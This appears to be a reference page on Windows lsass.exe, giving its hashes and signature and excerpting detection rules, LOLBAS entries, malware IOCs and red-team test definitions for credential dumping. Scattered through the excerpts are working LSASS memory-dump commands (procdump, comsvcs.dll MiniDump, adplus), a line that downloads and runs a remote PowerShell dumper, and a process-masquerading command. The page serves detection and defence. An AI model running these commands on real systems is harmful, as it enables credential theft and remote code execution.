lsass.exe

  • File Path: C:\Windows\system32\lsass.exe
  • Description: Local Security Authority Process

Hashes

Type Hash
MD5 5AE8589CDDE46ED132AEF8280BC8894A
SHA1 20A244C0440ED0B418F454F8A12ED0DE6A8BD6D2
SHA256 D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4
SHA384 A2A00CB7709B7E90EEA20781D3E156532D69265E7C1430C613A3ECA4AB214A556C484A6663C7494B97EBF678D14A761D
SHA512 E8949C6EF0D5DAC5A89536734305AEE0CD1F28055B77367981EB065CA967AA391FDC9C14C634DE5119D7719BCA36A10B2B079ADF9E705028F9C0A706F202F077
SSDEEP 768:xorvR2Fw+l+EPbRXFk5sM9cxTS3Pgez2F6zHoeTosKzls65ztMIrJ2fy1PTSi:xTFw+l+Azk55zV8eTY5JJGiJ2qPTSi

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: lsass.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.2580 (rs1_release_inmarket.181009-1745)
  • Product Version: 10.0.14393.2580
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of lsass.exe being misused. While lsass.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma zeek_smb_converted_win_transferring_files_with_credential_data.yml - '\lsass' DRL 1.0
sigma win_lm_namedpipe.yml - 'lsass' DRL 1.0
sigma win_lsass_access_non_system_account.yml title: LSASS Access from Non System Account DRL 1.0
sigma win_lsass_access_non_system_account.yml description: Detects potential mimikatz-like tools accessing LSASS from non system account DRL 1.0
sigma win_lsass_access_non_system_account.yml ObjectName|endswith: '\lsass.exe' DRL 1.0
sigma win_suspicious_outbound_kerberos_connection.yml - '\lsass.exe' DRL 1.0
sigma win_susp_lsass_dump.yml title: Password Dumper Activity on LSASS DRL 1.0
sigma win_susp_lsass_dump.yml description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN DRL 1.0
sigma win_susp_lsass_dump.yml ProcessName|endswith: '\lsass.exe' DRL 1.0
sigma win_susp_lsass_dump_generic.yml title: Generic Password Dumper Activity on LSASS DRL 1.0
sigma win_susp_lsass_dump_generic.yml description: Detects process handle on LSASS process with certain access mask DRL 1.0
sigma win_susp_lsass_dump_generic.yml ObjectName|endswith: '\lsass.exe' DRL 1.0
sigma win_susp_lsass_dump_generic.yml - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it DRL 1.0
sigma win_transferring_files_with_credential_data_via_network_shares.yml - '\lsass' DRL 1.0
sigma win_alert_lsass_access.yml title: LSASS Access Detected via Attack Surface Reduction DRL 1.0
sigma win_alert_lsass_access.yml description: Detects Access to LSASS Process DRL 1.0
sigma win_alert_lsass_access.yml definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' DRL 1.0
sigma win_alert_lsass_access.yml Path|endswith: '\lsass.exe' DRL 1.0
sigma sysmon_password_dumper_lsass.yml title: Password Dumper Remote Thread in LSASS DRL 1.0
sigma sysmon_password_dumper_lsass.yml description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. DRL 1.0
sigma sysmon_password_dumper_lsass.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml title: Mimikatz Detection LSASS Access DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml - Some security products access LSASS in this way. DRL 1.0
sigma file_event_win_creation_system_file.yml - '\lsass.exe' DRL 1.0
sigma file_event_win_hack_dumpert.yml description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory DRL 1.0
sigma file_event_win_hktl_createminidump.yml description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine DRL 1.0
sigma file_event_win_hktl_createminidump.yml - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass DRL 1.0
sigma file_event_win_hktl_createminidump.yml TargetFilename|endswith: '\lsass.dmp' DRL 1.0
sigma file_event_win_lsass_dump.yml title: LSASS Process Memory Dump Files DRL 1.0
sigma file_event_win_lsass_dump.yml description: Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials DRL 1.0
sigma file_event_win_lsass_dump.yml - https://www.google.com/search?q=procdump+lsass DRL 1.0
sigma file_event_win_lsass_dump.yml - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass.dmp' DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass.zip' DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass.rar' DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass' DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml title: LSASS Memory Dump File Creation DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml TargetFilename|contains: 'lsass' DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic investigator DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml - Dumps of another process that contains lsass in its process name (substring) DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml description: Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. DRL 1.0
sigma image_load_tttracer_mod_load.yml description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. DRL 1.0
sigma image_load_unsigned_image_loaded_into_lsass.yml title: Unsigned Image Loaded Into LSASS Process DRL 1.0
sigma image_load_unsigned_image_loaded_into_lsass.yml description: Loading unsigned image (DLL, EXE) into LSASS process DRL 1.0
sigma image_load_unsigned_image_loaded_into_lsass.yml Image|endswith: '\lsass.exe' DRL 1.0
sigma net_connection_win_suspicious_outbound_kerberos_connection.yml - '\lsass.exe' DRL 1.0
sigma posh_ps_suspicious_getprocess_lsass.yml title: PowerShell Get-Process LSASS in ScriptBlock DRL 1.0
sigma posh_ps_suspicious_getprocess_lsass.yml description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity DRL 1.0
sigma posh_ps_suspicious_getprocess_lsass.yml ScriptBlockText|contains: 'Get-Process lsass' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml title: Credentials Dumping Tools Accessing LSASS Memory DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml description: Detects process access LSASS memory which is typical for credentials dumping tools DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - Legitimate software accessing LSASS process for legitimate reason; please add more filters DRL 1.0
sigma proc_access_win_lazagne_cred_dump_lsass_access.yml description: Detects LSASS process access by LaZagne for credential dumping. DRL 1.0
sigma proc_access_win_lazagne_cred_dump_lsass_access.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml title: Lsass Memory Dump via Comsvcs DLL DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump.yml title: LSASS Memory Dump DRL 1.0
sigma proc_access_win_lsass_memdump.yml description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. DRL 1.0
sigma proc_access_win_lsass_memdump.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml title: LSASS Access from White-Listed Processes DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml description: Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml - Unlikely, since these tools shouldn't access lsass.exe at all DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml title: LSASS Memory Access by Tool Named Dump DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml - Rare programs that contain the word dump in their name and access lsass DRL 1.0
sigma proc_access_win_mimikatz_trough_winrm.yml description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe. DRL 1.0
sigma proc_access_win_mimikatz_trough_winrm.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_pypykatz_cred_dump_lsass_access.yml description: Detects LSASS process access by pypykatz for credential dumping. DRL 1.0
sigma proc_access_win_pypykatz_cred_dump_lsass_access.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml title: Suspicious GrantedAccess Flags on LSASS Access DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml description: Detects process access to LSASS memory with suspicious access flags DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\System32\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - Legitimate software accessing LSASS process for legitimate reason DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml title: LSASS Access from Program in Suspicious Folder DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml - Legitimate software accessing LSASS process for legitimate reason DRL 1.0
sigma proc_creation_win_abusing_debug_privilege.yml - '\lsass.exe' DRL 1.0
sigma proc_creation_win_credential_access_via_password_filter.yml description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS DRL 1.0
sigma proc_creation_win_hack_dumpert.yml description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory DRL 1.0
sigma proc_creation_win_hktl_createminidump.yml description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine DRL 1.0
sigma proc_creation_win_hktl_createminidump.yml - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass DRL 1.0
sigma proc_creation_win_lsass_dump.yml title: LSASS Memory Dumping DRL 1.0
sigma proc_creation_win_lsass_dump.yml description: Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials. DRL 1.0
sigma proc_creation_win_lsass_dump.yml - 'lsass' DRL 1.0
sigma proc_creation_win_lsass_dump.yml CommandLine|contains: 'lsass' DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'lsass' DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'copy lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'move lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp DRL 1.0
sigma proc_creation_win_proc_wrong_parent.yml - '\lsass.exe' DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml title: Suspicious LSASS Process Clone DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml description: Detects a suspicious LSASS process clone that could be a sign of process dumping activity DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml Image|endswith: '\Windows\System32\lsass.exe' DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml ParentImage|endswith: '\Windows\System32\lsass.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_getprocess_lsass.yml title: PowerShell Get-Process LSASS DRL 1.0
sigma proc_creation_win_susp_powershell_getprocess_lsass.yml description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity DRL 1.0
sigma proc_creation_win_susp_powershell_getprocess_lsass.yml - 'Get-Process lsass' DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml title: Suspicious Use of Procdump on LSASS DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml CommandLine|contains: ' lsass' DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml - Unlikely, because no one should dump lsass process memory DRL 1.0
sigma proc_creation_win_susp_trolleyexpress_procdump.yml description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory DRL 1.0
sigma proc_creation_win_susp_trolleyexpress_procdump.yml # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\lsass.exe' DRL 1.0
sigma proc_creation_win_tttracer_mod_load.yml description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. DRL 1.0
sigma proc_creation_win_xordump.yml - ' -process lsass.exe ' DRL 1.0
sigma registry_event_add_local_hidden_user.yml Image|endswith: 'lsass.exe' DRL 1.0
sigma registry_event_silentprocessexit.yml - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml title: SilentProcessExit Monitor Registration for LSASS DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml description: Detects changes to the Registry in which a monitor program gets registered to dump process memory of the lsass.exe process memory DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe' DRL 1.0
sigma registry_event_susp_lsass_dll_load.yml title: DLL Load via LSASS DRL 1.0
sigma registry_event_susp_lsass_dll_load.yml description: Detects a method to load DLL via LSASS process using an undocumented Registry key DRL 1.0
sigma sysmon_accessing_winapi_in_powershell_credentials_dumping.yml description: Detects Accessing to lsass.exe by Powershell DRL 1.0
sigma sysmon_accessing_winapi_in_powershell_credentials_dumping.yml TargetImage|endswith: '\lsass.exe' DRL 1.0
LOLBAS comsvcs.yml Usecase: Dump Lsass.exe process memory to retrieve credentials.  
LOLBAS Adplus.yml - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet  
LOLBAS Adplus.yml Description: Creates a memory dump of the lsass process  
LOLBAS Adplus.yml - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/  
LOLBAS Sqldumper.yml Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.  
malware-ioc exchange_exploitation af421b1f5a08499e130d24f448f6d79f7c76af2b | Win64/Riskware.LsassDumper.J | LSASS dumper used by Tonto Team © ESET 2014-2018
malware-ioc famoussparrow 76C430B55F180A85F4E1A1E40E4A2EA37DB97599 | Win64/Kryptik.BSQ | Lsass dumper © ESET 2014-2018
malware-ioc nukesped_lazarus .lsass.dll © ESET 2014-2018
atomic-red-team index.md - T1003.001 LSASS Memory MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #8: LSASS read with pypykatz [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1547.008 LSASS Driver CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Masquerading as Windows LSASS process [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1003.001 LSASS Memory MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #8: LSASS read with pypykatz [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1547.008 LSASS Driver CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Masquerading as Windows LSASS process [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Shared Modules CONTRIBUTE A TEST | DLL Search Order Hijacking | Dylib Hijacking CONTRIBUTE A TEST | Deobfuscate/Decode Files or Information | LSASS Memory | System Checks | | Remote Data Staging CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Dynamic Linker Hijacking | SAML Tokens | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | LSASS Driver CONTRIBUTE A TEST | Local Accounts | Executable Installer File Permissions Weakness CONTRIBUTE A TEST | Steal Application Access Token CONTRIBUTE A TEST | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | Windows Command Shell | Default Accounts | Domain Trust Modification CONTRIBUTE A TEST | Disable Windows Event Logging | LSASS Memory | System Information Discovery | | Man-in-the-Middle CONTRIBUTE A TEST | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Execution Guardrails CONTRIBUTE A TEST | Password Spraying | | | | | Remote Access Software | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | LSASS Driver CONTRIBUTE A TEST | Local Accounts | Exploitation for Defense Evasion CONTRIBUTE A TEST | Private Keys | | | | | Standard Encoding | | MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md # T1003.001 - LSASS Memory MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md * procdump -ma lsass.exe lsass_dump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #2 - Dump LSASS.exe Memory using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #5 - Dump LSASS.exe Memory using NanoDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #8 - LSASS read with pypykatz MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md #{procdump_exe} -accepteula -ma lsass.exe #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #5 - Dump LSASS.exe Memory using NanoDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md 2. Select lsass.exe: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md 3. Dump lsass.exe memory: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ##### Description: Lsass dump must exist at specified location (#{input_file}) MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #8 - LSASS read with pypykatz MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md #{procdump_exe} -accepteula -mm lsass.exe #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp| MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md $LSASS = tasklist | findstr "lsass" MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md $FIELDS = $LSASS -split "\s+" MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #1 - Masquerading as Windows LSASS process MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #1 - Masquerading as Windows LSASS process MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md %SystemRoot%\Temp\lsass.exe /B MIT License. © 2018 Red Canary
